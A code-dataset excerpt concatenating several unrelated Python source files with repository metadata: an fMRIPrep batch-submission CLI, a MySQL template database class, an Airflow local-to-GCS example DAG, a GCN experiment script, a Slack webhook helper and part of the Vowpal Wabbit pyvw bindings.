otheropts=config.config['FMRIPrepOptions']['CommandLineOpts']
)))
batch_manager.compilejobstrings()
if submit:
batch_manager.submit_jobs()
else:
batch_manager.print_jobs()
| 59.9 | 184 | 0.682805 | import os
import click
import sys
import logging
from .batch_manager import BatchManager, Job
from .config_json_parser import ClpipeConfigParser
from .error_handler import exception_handler
@click.command()
@click.argument('subjects', nargs=-1, required=False, default=None)
@click.option('-config_file', type=click.Path(exists=True, dir_okay=False, file_okay=True), default=None,
help='Use a given configuration file. If left blank, uses the default config file, requiring definition of BIDS, working and output directories.')
@click.option('-bids_dir', type=click.Path(exists=True, dir_okay=True, file_okay=False),
help='Which BIDS directory to process. If a configuration file is provided with a BIDS directory, this argument is not necessary.')
@click.option('-working_dir', type=click.Path(dir_okay=True, file_okay=False),
help='Where to generate the working directory. If a configuration file is provided with a working directory, this argument is not necessary.')
@click.option('-output_dir', type=click.Path(dir_okay=True, file_okay=False),
help='Where to put the preprocessed data. If a configuration file is provided with a output directory, this argument is not necessary.')
@click.option('-log_dir', type=click.Path(dir_okay=True, file_okay=False),
help='Where to put HPC output files (such as SLURM output files)')
@click.option('-submit', is_flag=True, default=False, help='Flag to submit commands to the HPC')
@click.option('-debug', is_flag=True, help='Flag to enable detailed error messages and traceback')
def fmriprep_process(bids_dir=None, working_dir=None, output_dir=None, config_file=None, subjects=None,log_dir=None,submit=False, debug=False):
if not debug:
sys.excepthook = exception_handler
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.DEBUG)
config = ClpipeConfigParser()
config.config_updater(config_file)
config.setup_fmriprep_directories(bids_dir, working_dir, output_dir, log_dir)
if not any([config.config['FMRIPrepOptions']['BIDSDirectory'], config.config['FMRIPrepOptions']['OutputDirectory'],
config.config['FMRIPrepOptions']['WorkingDirectory'],
config.config['FMRIPrepOptions']['LogDirectory']]):
raise ValueError(
'Please make sure the BIDS, working and output directories are specified in either the configfile or in the command. At least one is not specified.')
singularity_string = '''unset PYTHONPATH; {templateflow1} singularity run -B {templateflow2}{bindPaths} {batchcommands} {fmriprepInstance} {bids_dir} {output_dir} participant ''' \
'''--participant-label {participantLabels} -w {working_dir} --fs-license-file {fslicense} {threads} {otheropts}'''
docker_string = '''docker run --rm -ti'''\
'''-v {fslicense}:/opt/freesurfer/license.txt:ro '''\
'''-v {bids_dir}:/data:ro -v {output_dir}:/out ''' \
'''-v {working_dir}:/work ''' \
'''{docker_fmriprep} /data /out participant -w /work {threads} {otheropts} --participant-label {participantLabels}'''
if config.config['FMRIPrepOptions']['TemplateFlowToggle']:
template1 = "export SINGULARITYENV_TEMPLATEFLOW_HOME={templateflowpath};".format(templateflowpath=config.config["FMRIPrepOptions"]["TemplateFlowPath"])
template2 = "${{TEMPLATEFLOW_HOME:-$HOME/.cache/templateflow}}:{templateflowpath},".format(templateflowpath =config.config["FMRIPrepOptions"]["TemplateFlowPath"])
else:
template1 = ""
template2 = ""
if not subjects:
subjectstring = "ALL"
sublist = [o.replace('sub-', '') for o in os.listdir(config.config['FMRIPrepOptions']['BIDSDirectory'])
if os.path.isdir(os.path.join(config.config['FMRIPrepOptions']['BIDSDirectory'], o)) and 'sub-' in o]
else:
subjectstring = " , ".join(subjects)
sublist = subjects
batch_manager = BatchManager(config.config['BatchConfig'], config.config['FMRIPrepOptions']['LogDirectory'])
batch_manager.update_mem_usage(config.config['FMRIPrepOptions']['FMRIPrepMemoryUsage'])
batch_manager.update_time(config.config['FMRIPrepOptions']['FMRIPrepTimeUsage'])
batch_manager.update_nthreads(config.config['FMRIPrepOptions']['NThreads'])
batch_manager.update_email(config.config["EmailAddress"])
if batch_manager.config['ThreadCommandActive']:
threads = '--nthreads ' + batch_manager.get_threads_command()[1]
else:
threads = ''
for sub in sublist:
if config.config['FMRIPrepOptions']['DockerToggle']:
batch_manager.addjob(Job("sub-" + sub + "_fmriprep", docker_string.format(
docker_fmriprep=config.config['FMRIPrepOptions']['DockerFMRIPrepVersion'],
bids_dir=config.config['FMRIPrepOptions']['BIDSDirectory'],
output_dir=config.config['FMRIPrepOptions']['OutputDirectory'],
working_dir=config.config['FMRIPrepOptions']['WorkingDirectory'],
participantLabels=sub,
fslicense=config.config['FMRIPrepOptions']['FreesurferLicensePath'],
threads= threads,
otheropts=config.config['FMRIPrepOptions']['CommandLineOpts']
)))
else:
batch_manager.addjob(Job("sub-" + sub + "_fmriprep", singularity_string.format(
templateflow1 = template1,
templateflow2 = template2,
fmriprepInstance=config.config['FMRIPrepOptions']['FMRIPrepPath'],
bids_dir=config.config['FMRIPrepOptions']['BIDSDirectory'],
output_dir=config.config['FMRIPrepOptions']['OutputDirectory'],
working_dir=config.config['FMRIPrepOptions']['WorkingDirectory'],
batchcommands=batch_manager.config["FMRIPrepBatchCommands"],
participantLabels=sub,
fslicense=config.config['FMRIPrepOptions']['FreesurferLicensePath'],
threads= threads,
bindPaths=batch_manager.config['SingularityBindPaths'],
otheropts=config.config['FMRIPrepOptions']['CommandLineOpts']
)))
batch_manager.compilejobstrings()
if submit:
batch_manager.submit_jobs()
else:
batch_manager.print_jobs()
| true | true |
f725db44f7c222d549edd398c8d51bd4cea4c003 | 2,788 | py | Python | db/tpl.py | iamaguoke/qiandao | a60b99ceb7c22a6dcec14621c00a4c1a7c02e940 | [
"MIT"
] | 40 | 2021-07-29T18:31:28.000Z | 2022-03-28T12:56:11.000Z | db/tpl.py | iamaguoke/qiandao | a60b99ceb7c22a6dcec14621c00a4c1a7c02e940 | [
"MIT"
] | 35 | 2021-08-20T03:47:54.000Z | 2022-02-26T12:36:11.000Z | db/tpl.py | iamaguoke/qiandao | a60b99ceb7c22a6dcec14621c00a4c1a7c02e940 | [
"MIT"
] | 12 | 2021-08-01T12:55:51.000Z | 2022-03-19T11:11:48.000Z | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-08-07 22:27:07
import time
import config
from .basedb import BaseDB
class TPLDB(BaseDB):
'''
tpl db
id, userid, siteurl, sitename, banner, disabled, public, fork, har, tpl, variables, interval, note, ctime, mtime, atime, last_success
'''
__tablename__ = 'tpl'
def __init__(self, host=config.mysql.host, port=config.mysql.port,
database=config.mysql.database, user=config.mysql.user, passwd=config.mysql.passwd, auth_plugin=config.mysql.auth_plugin):
import mysql.connector
self.conn = mysql.connector.connect(user=user, password=passwd, host=host, port=port,
database=database, auth_plugin=auth_plugin, autocommit=True)
def add(self, userid, har, tpl, variables, interval=None):
now = time.time()
insert = dict(
userid = userid,
siteurl = None,
sitename = None,
banner = None,
disabled = 0,
public = 0,
fork = None,
har = har,
tpl = tpl,
variables = variables,
interval = interval,
ctime = now,
mtime = now,
atime = now,
last_success = None,
)
return self._insert(**insert)
def mod(self, id, **kwargs):
return self._update(where="id=%s" % self.placeholder, where_values=(id, ), **kwargs)
def get(self, id, fields=None):
for tpl in self._select2dic(what=fields, where='id=%s' % self.placeholder, where_values=(id, )):
return tpl
def delete(self, id):
self._delete(where="id=%s" % self.placeholder, where_values=(id, ))
def incr_success(self, id):
self._execute('UPDATE %s SET success_count=success_count+1, last_success=%d WHERE `id`=%d' % (
self.escape(self.__tablename__), time.time(), int(id)))
def incr_failed(self, id):
self._execute('UPDATE %s SET failed_count=failed_count+1 WHERE `id`=%d' % (
self.escape(self.__tablename__), int(id)))
def list(self, fields=None, limit=None, **kwargs):
where = '1=1'
where_values = []
for key, value in kwargs.items():
if value is None:
where += ' and %s is %s' % (self.escape(key), self.placeholder)
else:
where += ' and %s = %s' % (self.escape(key), self.placeholder)
where_values.append(value)
for tpl in self._select2dic(what=fields, where=where, where_values=where_values, limit=limit):
yield tpl
| 36.207792 | 137 | 0.571019 |
import time
import config
from .basedb import BaseDB
class TPLDB(BaseDB):
__tablename__ = 'tpl'
def __init__(self, host=config.mysql.host, port=config.mysql.port,
database=config.mysql.database, user=config.mysql.user, passwd=config.mysql.passwd, auth_plugin=config.mysql.auth_plugin):
import mysql.connector
self.conn = mysql.connector.connect(user=user, password=passwd, host=host, port=port,
database=database, auth_plugin=auth_plugin, autocommit=True)
def add(self, userid, har, tpl, variables, interval=None):
now = time.time()
insert = dict(
userid = userid,
siteurl = None,
sitename = None,
banner = None,
disabled = 0,
public = 0,
fork = None,
har = har,
tpl = tpl,
variables = variables,
interval = interval,
ctime = now,
mtime = now,
atime = now,
last_success = None,
)
return self._insert(**insert)
def mod(self, id, **kwargs):
return self._update(where="id=%s" % self.placeholder, where_values=(id, ), **kwargs)
def get(self, id, fields=None):
for tpl in self._select2dic(what=fields, where='id=%s' % self.placeholder, where_values=(id, )):
return tpl
def delete(self, id):
self._delete(where="id=%s" % self.placeholder, where_values=(id, ))
def incr_success(self, id):
self._execute('UPDATE %s SET success_count=success_count+1, last_success=%d WHERE `id`=%d' % (
self.escape(self.__tablename__), time.time(), int(id)))
def incr_failed(self, id):
self._execute('UPDATE %s SET failed_count=failed_count+1 WHERE `id`=%d' % (
self.escape(self.__tablename__), int(id)))
def list(self, fields=None, limit=None, **kwargs):
where = '1=1'
where_values = []
for key, value in kwargs.items():
if value is None:
where += ' and %s is %s' % (self.escape(key), self.placeholder)
else:
where += ' and %s = %s' % (self.escape(key), self.placeholder)
where_values.append(value)
for tpl in self._select2dic(what=fields, where=where, where_values=where_values, limit=limit):
yield tpl
| true | true |
f725db70338fae233d3d7b81bce2649a1d1b3d56 | 1,745 | py | Python | airflow/providers/google/cloud/example_dags/example_local_to_gcs.py | ChaseKnowlden/airflow | 6b71eac1997a7c0db3b8e3aed6b4e65d01871440 | [
"Apache-2.0"
] | 15,947 | 2019-01-05T13:51:02.000Z | 2022-03-31T23:33:16.000Z | airflow/providers/google/cloud/example_dags/example_local_to_gcs.py | ChaseKnowlden/airflow | 6b71eac1997a7c0db3b8e3aed6b4e65d01871440 | [
"Apache-2.0"
] | 14,603 | 2019-01-05T09:43:19.000Z | 2022-03-31T23:11:59.000Z | airflow/providers/google/cloud/example_dags/example_local_to_gcs.py | ChaseKnowlden/airflow | 6b71eac1997a7c0db3b8e3aed6b4e65d01871440 | [
"Apache-2.0"
] | 8,429 | 2019-01-05T19:45:47.000Z | 2022-03-31T22:13:01.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
from airflow import models
from airflow.providers.google.cloud.transfers.local_to_gcs import LocalFilesystemToGCSOperator
from airflow.utils import dates
# [START howto_gcs_environment_variables]
BUCKET_NAME = os.environ.get('GCP_GCS_BUCKET', 'example-bucket-name')
PATH_TO_UPLOAD_FILE = os.environ.get('GCP_GCS_PATH_TO_UPLOAD_FILE', 'example-text.txt')
DESTINATION_FILE_LOCATION = os.environ.get('GCP_GCS_DESTINATION_FILE_LOCATION', 'example-text.txt')
# [END howto_gcs_environment_variables]
with models.DAG(
'example_local_to_gcs',
default_args=dict(start_date=dates.days_ago(1)),
schedule_interval='@once',
tags=['example'],
) as dag:
# [START howto_operator_local_filesystem_to_gcs]
upload_file = LocalFilesystemToGCSOperator(
task_id="upload_file",
src=PATH_TO_UPLOAD_FILE,
dst=DESTINATION_FILE_LOCATION,
bucket=BUCKET_NAME,
)
# [END howto_operator_local_filesystem_to_gcs]
| 38.777778 | 99 | 0.773066 |
import os
from airflow import models
from airflow.providers.google.cloud.transfers.local_to_gcs import LocalFilesystemToGCSOperator
from airflow.utils import dates
BUCKET_NAME = os.environ.get('GCP_GCS_BUCKET', 'example-bucket-name')
PATH_TO_UPLOAD_FILE = os.environ.get('GCP_GCS_PATH_TO_UPLOAD_FILE', 'example-text.txt')
DESTINATION_FILE_LOCATION = os.environ.get('GCP_GCS_DESTINATION_FILE_LOCATION', 'example-text.txt')
with models.DAG(
'example_local_to_gcs',
default_args=dict(start_date=dates.days_ago(1)),
schedule_interval='@once',
tags=['example'],
) as dag:
upload_file = LocalFilesystemToGCSOperator(
task_id="upload_file",
src=PATH_TO_UPLOAD_FILE,
dst=DESTINATION_FILE_LOCATION,
bucket=BUCKET_NAME,
)
| true | true |
f725dc18c0de850fd97c348c18d72de36f535c2c | 972 | py | Python | main.py | minkowski0125/multilayer-gcn-simulation | 15a4cd29d819246549148e3a32c99f3b8589f3b4 | [
"MIT"
] | null | null | null | main.py | minkowski0125/multilayer-gcn-simulation | 15a4cd29d819246549148e3a32c99f3b8589f3b4 | [
"MIT"
] | null | null | null | main.py | minkowski0125/multilayer-gcn-simulation | 15a4cd29d819246549148e3a32c99f3b8589f3b4 | [
"MIT"
] | null | null | null | import json
from utils import *
from config import args
from train import train
from torch.utils.tensorboard import SummaryWriter
if __name__ == '__main__':
set_seed(args.seed)
series = []
if args.dataset == 'pubmed':
graphs, features, adjs, labels = load_pubmed_data({
'deg_num': args.deg,
'sample_num': 1,
})
elif args.dataset == 'random':
graphs, features, adjs, labels = load_pubmed_data({
'deg_num': args.deg,
'feat_dim': args.feat_dim,
'sample_num': 1,
})
writer = SummaryWriter(f'./log_pubmed')
hiddens = [50, 100, 200, 500, 1000, 1500, 2000, 3000]
for hidden in hiddens:
series.append(train(data = (graphs, features, adjs, labels), deg = args.deg, feat_dim = args.feat_dim, hidden_dim = hidden, layer_num = args.layer_num, o = 0, writer=writer))
print()
visualize(series, hiddens, 'hidden')
# print(series)
| 30.375 | 182 | 0.609053 | import json
from utils import *
from config import args
from train import train
from torch.utils.tensorboard import SummaryWriter
if __name__ == '__main__':
set_seed(args.seed)
series = []
if args.dataset == 'pubmed':
graphs, features, adjs, labels = load_pubmed_data({
'deg_num': args.deg,
'sample_num': 1,
})
elif args.dataset == 'random':
graphs, features, adjs, labels = load_pubmed_data({
'deg_num': args.deg,
'feat_dim': args.feat_dim,
'sample_num': 1,
})
writer = SummaryWriter(f'./log_pubmed')
hiddens = [50, 100, 200, 500, 1000, 1500, 2000, 3000]
for hidden in hiddens:
series.append(train(data = (graphs, features, adjs, labels), deg = args.deg, feat_dim = args.feat_dim, hidden_dim = hidden, layer_num = args.layer_num, o = 0, writer=writer))
print()
visualize(series, hiddens, 'hidden')
| true | true |
f725dc7d2c733d4a8ac8fe71d0f7b4f4d8da1077 | 292 | py | Python | camping_server2/bot/slackbot.py | solyourock/crawling_project | 068525f299eb180d46f1537ee2a02648bbec61ec | [
"MIT"
] | null | null | null | camping_server2/bot/slackbot.py | solyourock/crawling_project | 068525f299eb180d46f1537ee2a02648bbec61ec | [
"MIT"
] | null | null | null | camping_server2/bot/slackbot.py | solyourock/crawling_project | 068525f299eb180d46f1537ee2a02648bbec61ec | [
"MIT"
] | null | null | null | import requests, json
import camping_server2.config as config
class IncomingWebhook:
def send_msg(err_msg):
payload = {"channel": "dss17", "username": "bot", "text": err_msg}
response = requests.post(config.Config.WEBHOOK_URL, json.dumps(payload))
print(response) | 36.5 | 80 | 0.69863 | import requests, json
import camping_server2.config as config
class IncomingWebhook:
def send_msg(err_msg):
payload = {"channel": "dss17", "username": "bot", "text": err_msg}
response = requests.post(config.Config.WEBHOOK_URL, json.dumps(payload))
print(response) | true | true |
f725dcd14f6c8b71ba1fb843294a5688b1583471 | 26,344 | py | Python | python/pyvw.py | alinabi/vowpal_wabbit | 518513e2023676f060f045ddb751fc1a5e0b7eb2 | [
"BSD-3-Clause"
] | 1 | 2021-07-06T20:02:44.000Z | 2021-07-06T20:02:44.000Z | python/pyvw.py | alinabi/vowpal_wabbit | 518513e2023676f060f045ddb751fc1a5e0b7eb2 | [
"BSD-3-Clause"
] | null | null | null | python/pyvw.py | alinabi/vowpal_wabbit | 518513e2023676f060f045ddb751fc1a5e0b7eb2 | [
"BSD-3-Clause"
] | null | null | null | import sys
import pylibvw
class SearchTask():
def __init__(self, vw, sch, num_actions):
self.vw = vw
self.sch = sch
self.blank_line = self.vw.example("")
self.blank_line.finish()
self.bogus_example = self.vw.example("1 | x")
def __del__(self):
self.bogus_example.finish()
pass
def _run(self, your_own_input_example):
pass
def _call_vw(self, my_example, isTest, useOracle=False): # run_fn, setup_fn, takedown_fn, isTest):
self._output = None
self.bogus_example.set_test_only(isTest)
def run(): self._output = self._run(my_example)
setup = None
takedown = None
if callable(getattr(self, "_setup", None)): setup = lambda: self._setup(my_example)
if callable(getattr(self, "_takedown", None)): takedown = lambda: self._takedown(my_example)
self.sch.set_structured_predict_hook(run, setup, takedown)
self.sch.set_force_oracle(useOracle)
self.vw.learn(self.bogus_example)
self.vw.learn(self.blank_line) # this will cause our ._run hook to get called
def learn(self, data_iterator):
for my_example in data_iterator.__iter__():
self._call_vw(my_example, isTest=False);
def example(self, initStringOrDict=None, labelType=pylibvw.vw.lDefault):
"""TODO"""
if self.sch.predict_needs_example():
return self.vw.example(initStringOrDict, labelType)
else:
return self.vw.example(None, labelType)
def predict(self, my_example, useOracle=False):
self._call_vw(my_example, isTest=True, useOracle=useOracle);
return self._output
class vw(pylibvw.vw):
"""The pyvw.vw object is a (trivial) wrapper around the pylibvw.vw
object; you're probably best off using this directly and ignoring
the pylibvw.vw structure entirely."""
def __init__(self, argString=None, **kw):
"""Initialize the vw object. The (optional) argString is the
same as the command line arguments you'd use to run vw (eg,"--audit").
you can also use key/value pairs as in:
pyvw.vw(audit=True, b=24, k=True, c=True, l2=0.001)
or a combination, for instance:
pyvw.vw("--audit", b=26)"""
def format(key,val):
if type(val) is bool and val == False: return ''
s = ('-'+key) if len(key) == 1 else ('--'+key)
if type(val) is not bool or val != True: s += ' ' + str(val)
return s
l = [format(k,v) for k,v in kw.iteritems()]
if argString is not None: l = [argString] + l
#print ' '.join(l)
pylibvw.vw.__init__(self,' '.join(l))
self.finished = False
def get_weight(self, index, offset=0):
"""Given an (integer) index (and an optional offset), return
the weight for that position in the (learned) weight vector."""
return pylibvw.vw.get_weight(self, index, offset)
def learn(self, ec):
"""Perform an online update; ec can either be an example
object or a string (in which case it is parsed and then
learned on)."""
if isinstance(ec, str):
self.learn_string(ec)
else:
if hasattr(ec, 'setup_done') and not ec.setup_done:
ec.setup_example()
pylibvw.vw.learn(self, ec)
def finish(self):
"""stop VW by calling finish (and, eg, write weights to disk)"""
if not self.finished:
pylibvw.vw.finish(self)
self.finished = True
def example(self, stringOrDict=None, labelType=pylibvw.vw.lDefault):
"""TODO: document"""
return example(self, stringOrDict, labelType)
def __del__(self):
self.finish()
def init_search_task(self, search_task, task_data=None):
sch = self.get_search_ptr()
def predict(examples, my_tag, oracle, condition=None, allowed=None, learner_id=0):
"""The basic (via-reduction) prediction mechanism. Several
variants are supported through this overloaded function:
'examples' can be a single example (interpreted as
non-LDF mode) or a list of examples (interpreted as
LDF mode). it can also be a lambda function that
returns a single example or list of examples, and in
that list, each element can also be a lambda function
that returns an example. this is done for lazy
example construction (aka speed).
'my_tag' should be an integer id, specifying this prediction
'oracle' can be a single label (or in LDF mode a single
array index in 'examples') or a list of such labels if
the oracle policy is indecisive; if it is None, then
the oracle doesn't care
'condition' should be either: (1) a (tag,char) pair, indicating
to condition on the given tag with identifier from the char;
or (2) a (tag,len,char) triple, indicating to condition on
tag, tag-1, tag-2, ..., tag-len with identifiers char,
char+1, char+2, ..., char+len. or it can be a (heterogenous)
list of such things.
'allowed' can be None, in which case all actions are allowed;
or it can be list of valid actions (in LDF mode, this should
be None and you should encode the valid actions in 'examples')
'learner_id' specifies the underlying learner id
Returns a single prediction.
"""
P = sch.get_predictor(my_tag)
if sch.is_ldf():
# we need to know how many actions there are, even if we don't know their identities
while hasattr(examples, '__call__'): examples = examples()
if not isinstance(examples, list): raise TypeError('expected example _list_ in LDF mode for SearchTask.predict()')
P.set_input_length(len(examples))
if sch.predict_needs_example():
for n in range(len(examples)):
ec = examples[n]
while hasattr(ec, '__call__'): ec = ec() # unfold the lambdas
if not isinstance(ec, example) and not isinstance(ec, pylibvw.example): raise TypeError('non-example in LDF example list in SearchTask.predict()')
if hasattr(ec, 'setup_done') and not ec.setup_done:
ec.setup_example()
P.set_input_at(n, ec)
else:
pass # TODO: do we need to set the examples even though they're not used?
else:
if sch.predict_needs_example():
while hasattr(examples, '__call__'): examples = examples()
if hasattr(examples, 'setup_done') and not examples.setup_done:
examples.setup_example()
P.set_input(examples)
else:
pass # TODO: do we need to set the examples even though they're not used?
# if (isinstance(examples, list) and all([isinstance(ex, example) or isinstance(ex, pylibvw.example) for ex in examples])) or \
# isinstance(examples, example) or isinstance(examples, pylibvw.example):
# if isinstance(examples, list): # LDF
# P.set_input_length(len(examples))
# for n in range(len(examples)):
# P.set_input_at(n, examples[n])
# else: # non-LDF
# P.set_input(examples)
if True: # TODO: get rid of this
if oracle is None: pass
elif isinstance(oracle, list):
if len(oracle) > 0: P.set_oracles(oracle)
elif isinstance(oracle, int): P.set_oracle(oracle)
else: raise TypeError('expecting oracle to be a list or an integer')
if condition is not None:
if not isinstance(condition, list): condition = [condition]
for c in condition:
if not isinstance(c, tuple): raise TypeError('item ' + str(c) + ' in condition list is malformed')
if len(c) == 2 and isinstance(c[0], int) and isinstance(c[1], str) and len(c[1]) == 1:
P.add_condition(max(0, c[0]), c[1])
elif len(c) == 3 and isinstance(c[0], int) and isinstance(c[1], int) and isinstance(c[2], str) and len(c[2]) == 1:
P.add_condition_range(max(0,c[0]), max(0,c[1]), c[2])
else:
raise TypeError('item ' + str(c) + ' in condition list malformed')
if allowed is None: pass
elif isinstance(allowed, list):
P.set_alloweds(allowed)
else: raise TypeError('allowed argument wrong type')
if learner_id != 0: P.set_learner_id(learner_id)
p = P.predict()
return p
else:
raise TypeError("'examples' should be a pyvw example (or a pylibvw example), or a list of said things")
sch.predict = predict
num_actions = sch.get_num_actions()
return search_task(self, sch, num_actions) if task_data is None else search_task(self, sch, num_actions, task_data)
class namespace_id():
"""The namespace_id class is simply a wrapper to convert between
hash spaces referred to by character (eg 'x') versus their index
in a particular example. Mostly used internally, you shouldn't
really need to touch this."""
def __init__(self, ex, id):
"""Given an example and an id, construct a namespace_id. The
id can either be an integer (in which case we take it to be an
index into ex.indices[]) or a string (in which case we take
the first character as the namespace id)."""
if isinstance(id, int): # you've specified a namespace by index
if id < 0 or id >= ex.num_namespaces():
raise Exception('namespace ' + str(id) + ' out of bounds')
self.id = id
self.ord_ns = ex.namespace(id)
self.ns = chr(self.ord_ns)
elif isinstance(id, str): # you've specified a namespace by string
if len(id) == 0:
id = ' '
self.id = None # we don't know and we don't want to do the linear search requered to find it
self.ns = id[0]
self.ord_ns = ord(self.ns)
else:
raise Exception("ns_to_characterord failed because id type is unknown: " + str(type(id)))
class example_namespace():
"""The example_namespace class is a helper class that allows you
to extract namespaces from examples and operate at a namespace
level rather than an example level. Mainly this is done to enable
indexing like ex['x'][0] to get the 0th feature in namespace 'x'
in example ex."""
def __init__(self, ex, ns, ns_hash=None):
"""Construct an example_namespace given an example and a
target namespace (ns should be a namespace_id)"""
if not isinstance(ns, namespace_id):
raise TypeError
self.ex = ex
self.ns = ns
self.ns_hash = None
def num_features_in(self):
"""Return the total number of features in this namespace."""
return self.ex.num_features_in(self.ns)
def __getitem__(self, i):
"""Get the feature/value pair for the ith feature in this
namespace."""
f = self.ex.feature(self.ns, i)
v = self.ex.feature_weight(self.ns, i)
return (f, v)
def iter_features(self):
"""iterate over all feature/value pairs in this namespace."""
for i in range(self.num_features_in()):
yield self[i]
def push_feature(self, feature, v=1.):
"""Add an unhashed feature to the current namespace (fails if
setup has already run on this example)."""
if self.ns_hash is None:
self.ns_hash = self.ex.vw.hash_space( self.ns )
self.ex.push_feature(self.ns, feature, v, self.ns_hash)
def pop_feature(self):
"""Remove the top feature from the current namespace; returns True
if a feature was removed, returns False if there were no
features to pop."""
return self.ex.pop_feature(self.ns)
def push_features(self, ns, featureList):
"""Push a list of features to a given namespace. Each feature
in the list can either be an integer (already hashed) or a
string (to be hashed) and may be paired with a value or not
(if not, the value is assumed to be 1.0). See example.push_features
for examples."""
self.ex.push_features(self.ns, featureList)
class abstract_label:
"""An abstract class for a VW label."""
def __init__(self):
pass
def from_example(self, ex):
"""grab a label from a given VW example"""
raise Exception("from_example not yet implemented")
class simple_label(abstract_label):
def __init__(self, label=0., weight=1., initial=0., prediction=0.):
abstract_label.__init__(self)
if isinstance(label, example):
self.from_example(label)
else:
self.label = label
self.weight = weight
self.initial = initial
self.prediction = prediction
def from_example(self, ex):
self.label = ex.get_simplelabel_label()
self.weight = ex.get_simplelabel_weight()
self.initial = ex.get_simplelabel_initial()
self.prediction = ex.get_simplelabel_prediction()
def __str__(self):
s = str(self.label)
if self.weight != 1.:
s += ':' + self.weight
return s
class multiclass_label(abstract_label):
def __init__(self, label=1, weight=1., prediction=1):
abstract_label.__init__(self)
self.label = label
self.weight = weight
self.prediction = prediction
def from_example(self, ex):
self.label = ex.get_multiclass_label()
self.weight = ex.get_multiclass_weight()
self.prediction = ex.get_multiclass_prediction()
def __str__(self):
s = str(self.label)
if self.weight != 1.:
s += ':' + self.weight
return s
class cost_sensitive_label(abstract_label):
class wclass:
def __init__(self, label, cost=0., partial_prediction=0., wap_value=0.):
self.label = label
self.cost = cost
self.partial_prediction = partial_prediction
self.wap_value = wap_value
def __init__(self, costs=[], prediction=0):
abstract_label.__init__(self)
self.costs = costs
self.prediction = prediction
def from_example(self, ex):
self.prediction = ex.get_costsensitive_prediction()
self.costs = []
for i in range(ex.get_costsensitive_num_costs):
wc = wclass(ex.get_costsensitive_class(),
ex.get_costsensitive_cost(),
ex.get_costsensitive_partial_prediction(),
ex.get_costsensitive_wap_value())
self.costs.append(wc)
def __str__(self):
return '[' + ' '.join([str(c.label) + ':' + str(c.cost) for c in self.costs])
class cbandits_label(abstract_label):
class wclass:
def __init__(self, label, cost=0., partial_prediction=0., probability=0.):
self.label = label
self.cost = cost
self.partial_prediction = partial_prediction
self.probability = probability
def __init__(self, costs=[], prediction=0):
abstract_label.__init__(self)
self.costs = costs
self.prediction = prediction
def from_example(self, ex):
self.prediction = ex.get_cbandits_prediction()
self.costs = []
for i in range(ex.get_cbandits_num_costs):
wc = wclass(ex.get_cbandits_class(),
ex.get_cbandits_cost(),
ex.get_cbandits_partial_prediction(),
ex.get_cbandits_probability())
self.costs.append(wc)
def __str__(self):
return '[' + ' '.join([str(c.label) + ':' + str(c.cost) for c in self.costs])
class example(pylibvw.example):
"""The example class is a (non-trivial) wrapper around
pylibvw.example. Most of the wrapping is to make the interface
easier to use (by making the types safer via namespace_id) and
also with added python-specific functionality."""
def __init__(self, vw, initStringOrDict=None, labelType=pylibvw.vw.lDefault):
"""Construct a new example from vw. If initString is None, you
get an "empty" example which you can construct by hand (see, eg,
example.push_features). If initString is a string, then this
string is parsed as it would be from a VW data file into an
example (and "setup_example" is run). if it is a dict, then we add all features in that dictionary. finally, if it's a function, we (repeatedly) execute it fn() until it's not a function any more (for lazy feature computation)."""
while hasattr(initStringOrDict, '__call__'):
initStringOrDict = initStringOrDict()
if initStringOrDict is None:
pylibvw.example.__init__(self, vw, labelType)
self.setup_done = False
elif isinstance(initStringOrDict, str):
pylibvw.example.__init__(self, vw, labelType, initStringOrDict)
self.setup_done = True
elif isinstance(initStringOrDict, dict):
pylibvw.example.__init__(self, vw, labelType)
self.vw = vw
self.stride = vw.get_stride()
self.finished = False
self.push_feature_dict(vw, initStringOrDict)
self.setup_done = False
else:
raise TypeError('expecting string or dict as argument for example construction')
self.vw = vw
self.stride = vw.get_stride()
self.finished = False
self.labelType = labelType
def __del__(self):
self.finish()
def __enter__(self):
return self
def __exit__(self,typ,value,traceback):
self.finish()
return typ is None
def get_ns(self, id):
"""Construct a namespace_id from either an integer or string
(or, if a namespace_id is fed it, just return it directly)."""
if isinstance(id, namespace_id):
return id
else:
return namespace_id(self, id)
def __getitem__(self, id):
"""Get an example_namespace object associated with the given
namespace id."""
return example_namespace(self, self.get_ns(id))
def feature(self, ns, i):
"""Get the i-th hashed feature id in a given namespace (i can
range from 0 to self.num_features_in(ns)-1)"""
ns = self.get_ns(ns) # guaranteed to be a single character
f = pylibvw.example.feature(self, ns.ord_ns, i)
if self.setup_done:
f = (f - self.get_ft_offset()) / self.stride
return f
def feature_weight(self, ns, i):
"""Get the value(weight) associated with a given feature id in
a given namespace (i can range from 0 to
self.num_features_in(ns)-1)"""
return pylibvw.example.feature_weight(self, self.get_ns(ns).ord_ns, i)
def set_label_string(self, string):
"""Give this example a new label, formatted as a string (ala
the VW data file format)."""
pylibvw.example.set_label_string(self, self.vw, string, self.labelType)
def setup_example(self):
"""If this example hasn't already been setup (ie, quadratic
features constructed, etc.), do so."""
if self.setup_done:
raise Exception('trying to setup_example on an example that is already setup')
self.vw.setup_example(self)
self.setup_done = True
def unsetup_example(self):
"""If this example has been setup, reverse that process so you can continue editing the examples."""
if not self.setup_done:
raise Exception('trying to unsetup_example that has not yet been setup')
self.vw.unsetup_example(self)
self.setup_done = False
def learn(self):
"""Learn on this example (and before learning, automatically
call setup_example if the example hasn't yet been setup)."""
if not self.setup_done:
self.setup_example()
self.vw.learn(self)
def sum_feat_sq(self, ns):
"""Return the total sum feature-value squared for a given
namespace."""
return pylibvw.example.sum_feat_sq(self, self.get_ns(ns).ord_ns)
def num_features_in(self, ns):
"""Return the total number of features in a given namespace."""
return pylibvw.example.num_features_in(self, self.get_ns(ns).ord_ns)
def get_feature_id(self, ns, feature, ns_hash=None):
"""Return the hashed feature id for a given feature in a given
